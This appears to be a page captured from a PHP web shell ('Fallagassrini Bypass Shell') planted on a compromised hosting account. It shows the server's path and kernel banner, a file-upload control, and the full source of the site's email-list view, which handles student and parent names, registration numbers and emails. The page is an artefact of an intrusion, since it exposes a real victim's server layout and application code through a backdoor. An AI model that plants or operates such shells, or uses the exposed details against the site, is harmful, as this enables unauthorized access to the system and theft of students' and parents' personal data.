? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/public_html/savoyglobal.net/sec_old/application/views/email/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/public_html/savoyglobal.net/sec_old/application/views/email/emaillist.php

<?php
if (!defined('BASEPATH'))
    exit('No direct script access allowed');
$this->load->view('documentreadyfunctions');
$this->load->view('commonfunctions');
$template_details = $this->mastermodel->getdatas('emailtemplate');
?>

<script type="text/javascript" src="<?=base_url()?>assets/js/jquery.wysiwyg.js"></script>
<script type="text/javascript">
    $(function()
    {
        $('.wysiwyg').wysiwyg(
        {
            controls : {
                separator01 : { visible : true },
                separator03 : { visible : true },
                separator04 : { visible : true },
                separator00 : { visible : true },
                separator07 : { visible : false },
                separator02 : { visible : false },
                separator08 : { visible : false },
                insertOrderedList : { visible : true },
                insertUnorderedList : { visible : true },
                undo: { visible : true },
                redo: { visible : true },
                justifyLeft: { visible : true },
                justifyCenter: { visible : true },
                justifyRight: { visible : true },
                justifyFull: { visible : true },
                subscript: { visible : true },
                superscript: { visible : true },
                underline: { visible : true },
                increaseFontSize : { visible : false },
                decreaseFontSize : { visible : false }
            }
        } );
    });
</script>
<span id="inner_msg"></span>
<div class="icons_main">
    <div class="icons">
        <img src="<?= base_url() ?>assets/images/back.png"  title="Add New" class="clickimage" onclick="addformdisplay('view_send_email','email')" alt="Add New" align = "center" width="32" height="32"  />
    </div>
    <div class="icons_caption">
        <h4>Send Email</h4>
    </div>
</div>
<div class="clean"></div>
<?php
$attributes=array('id'=>'validateform','class'=>'validate');
echo form_open('email/addinemail/insertemail/view_send_email/1/', $attributes);

?>


<div class="grid_12">
    <div class="box">
        <div class="header main">Email List </div>
        <div class="content no-padding">
            <table id="" class="table">
                <thead>
                    <tr>
                        <th style="width: 17px;">Sl No.</th>
                        <th>Name</th>
                        <th>Nationality</th>
                        <th>Gender</th>
                        <th>Student Reg No</th>
                        <th>Batch Code</th>
                        <th>Email</th>
                        <th style="width: 135px;">Type</th>
                        <th style="width: 70px;">
                            <input name="checkall" checked id="checkall" type="checkbox" onchange="checkasll(this)"/>
                        </th>
                    </tr>
                </thead>
                <tbody>
                    <?php
                    $slno = 0;
                    if(!empty ($viewinfo))
                    {
                    if ($viewinfo->num_rows() > 0) {

                        $sorLst1 = array();
                         $list = $viewinfo->result();
                        foreach ($list as $user) {$sorLst[] = $user->master_id;}
                        array_multisort($sorLst, SORT_ASC, $list);
                        $list1=array();
                        foreach ($list as $row) {
                            if($row->type=='Father' || $row->type=='Mother' || $row->type=='Student')
                           {
                                $std_id=$this->mastermodel->get_single_field_value('student','student_id','reg_no',$row->reg);
                                $date=date("d-m-Y");
                                $batch=$this->mastermodel->get_single_field_value('batch','batch_id','batch_no',$row->batch_no);
                                $deactivate=$this->studentmodel->check_deactivate($batch,$std_id,$date);
                                 
                                if($deactivate==0)
                                { 
                                    
                                    $list1[]=$row;
                                }
                                
                               }
                               else
                               {
                                   $list1[]=$row;
                               }
                            
                        }
                        $temp="";
                         foreach ($list1 as $row) {
                            ?>
                            <tr <?php if ($slno % 2 == 0) { ?>class="first" <?php } else { ?> class="second" <?php } ?>>
                                <td><?php
                                    if($temp!=$row->sort_id)
                                    { echo ++$slno; }
                                    $temp=$row->sort_id;
                                    
                                    ?>
                                </td>
                                 <td><?= $row->name; ?></td>
                                <td><?= $row->nationality; ?></td>
                                <td><?= $row->gender; ?></td>
                                <?php 
                                if($row->type=='Father' || $row->type=='Mother' || $row->type=='Student')
                                {
                                ?>
                                <td><?=$row->reg;?></td>
                                <?php 
                                }
                            else {
                                    ?>
                                <td></td>
                                <?php
                                }
                                ?>
                                <td><?=$row->batch_no;?></td>
                                 
                                <td><?= $row->email; ?></td>
                                <td><?= $row->type; ?></td>
                                <td>
                                    <div class="actions_menu">
                                        <input type="hidden" name="<?php echo "receipent_name_" . $slno; ?>" value="<?= $row->name; ?>"/>
                                        <input type="hidden" name="<?php echo "receipent_type_" . $slno; ?>" value="<?= $row->type; ?>"/>
                                        <input name="<?php echo "check_email_" . $slno; ?>" checked value="<?= $row->email; ?>" id="check_email" type="checkbox"/>
                                    </div>
                                </td>
                            </tr>
                            <?php
                        }
                    }
                    }
                    ?>
                <input name="email_count" value="<?= $slno; ?>" type="hidden">
                </tbody>
            </table>
        </div>
        <div class="header main">Email Information</div>
        <div class="content no-padding">

            <div class="section _100">
                <label>Use Template</label>
                <div class="single_page">
                    <div style="width: 70%;">
                        <select name="template_id" id="template_id" onchange="usetemplate(this)">
                            <option value="" selected>Select Template</option>
                            <?php foreach ($template_details as $row) {
                                ?>
                                <option value="<?= $row['template_id'] ?>"><?= $row['template_title'] ?></option>
                                <?php
                            }
                            ?>
                        </select>
                    </div>
                </div>
            </div>

            <div class="section _100">
                <label>Subject</label>
                <div class="single_page">
                    <div>
                        <input type="text" class="required" name="template_subject" cols="50" id="template_subject" style="width: 70%;"/>
                    </div>
                </div>
            </div>


            <div class="section _100">
                <label>Contents</label>
                <div class="single_page">
                    <div style="width:700px;">
                        <div id="msg_notemp">
                            <textarea name="template_contents" class="required wysiwyg" cols="50" rows="15" style=" margin: 10px 0;width: 700px;"></textarea>                    
                        </div>
                        <div id="msg_temp">

                        </div>
                    </div>
                </div>
                <br/>
            </div>
        </div>
        <div class="actions">
            <input type="hidden" name="resfunction" value="search_send_email"/>
            <div class="actions-right">
                <button type="submit" id="submit" class="clickimage" onclick="addformdata('validateform')">Send</button>
            </div>
        </div>
    </div>
</div>

<?php
echo form_close();
?>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net